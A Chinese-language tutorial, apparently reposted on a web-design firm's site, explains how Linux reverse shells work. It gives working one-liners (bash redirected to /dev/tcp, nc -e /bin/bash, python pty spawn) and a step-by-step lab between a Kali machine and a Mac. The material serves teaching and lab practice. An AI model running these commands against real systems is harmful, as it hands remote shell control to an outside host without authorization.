這期內容當中小編將會給大家帶來有關linux中反彈shell的原理是什么,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。
創新互聯長期為1000多家客戶提供的網站建設服務,團隊從業經驗10年,關注不同地域、不同群體,并針對不同對象提供差異化的產品和服務;打造開放共贏平臺,與合作伙伴共同營造健康的互聯網生態環境。為黟縣企業提供專業的成都網站設計、成都網站制作,黟縣網站改版等技術服務。擁有十余年豐富建站經驗和眾多成功案例,為您定制開發。Linux是一種免費使用和自由傳播的類UNIX操作系統,是一個基于POSIX的多用戶、多任務、支持多線程和多CPU的操作系統,使用Linux能運行主要的Unix工具軟件、應用程序和網絡協議。
完整命令
反彈shell命令:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1
利用nc反彈shell:
nc -lvvp 12345 -t -e /bin/bash
原理
bash -i > /dev/tcp/ip/port 0>&1 2>&1
bash -i 打開一個交互式的bash
&是為了區分文件1和文件描述符1的
a>&b 的意思是 a>b 2>&1
0代表輸入 ,0>&1 意思是,將輸出的窗口上所輸入的值當作當前窗口的輸入。反彈shell后會有兩個窗口,即靶機的shell窗口跟攻擊機的shell口。這命令的意思也可以理解為,將攻擊機窗口的輸入當作靶機窗口的輸入最終輸入給靶機。2代表標準錯誤輸出。
實驗
通過一個小實驗幫助大家理解
第一步,將shell的正確輸出重定向到外部主機
假設我們在kali上輸入的命令為:bash -i > /dev/tcp/192.168.124.1/9999
,這句話的意思是將交互式shell的標準輸出重定向到192.168.124.1的9999端口。
在mac上監聽端口命令為:nc -l 9999
首先在kali上輸入whoami命令,發現沒有回顯,因為回顯被重定向到了mac上。
但是當我們在kali上出入錯誤命令的時候,卻存在回顯。
第二步,將錯誤輸出重定向到外部主機
我們只需要在上面的命令后面加上 2>&1即可,意思為將錯誤輸出重定向到標準輸出上,也就是重定向到我們的外部主機。
這時候發現在kali上按鍵盤已經沒有任何回顯了,回顯全部出現在了mac的shell上:
這是因為我們已經將所有的輸出都重定向到了外部主機上,但問題是現在我們的控制權還在kali上,mac無法進行任何輸出操作,只能顯示輸出。這時候我們幾句需要將輸入的權限給予我們的mac。
第三步,交出輸入權限
只需要在第二步命令的基礎上加上 0>&1即可。
這時候已經可以在mac上完全控制kali的shell了,實驗結束。
其他
當shell不穩定時候用python的虛擬化終端:
python -c "import pty;pty.spawn('/bin/bash')"
上述就是小編為大家分享的linux中反彈shell的原理是什么了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注創新互聯行業資訊頻道。
網站欄目:linux中反彈shell的原理是什么-創新互聯
瀏覽地址:http://vcdvsql.cn/article34/cedipe.html
成都網站建設公司_創新互聯,為您提供面包屑導航、外貿建站、企業建站、網站內鏈、網站制作、網站排名
聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯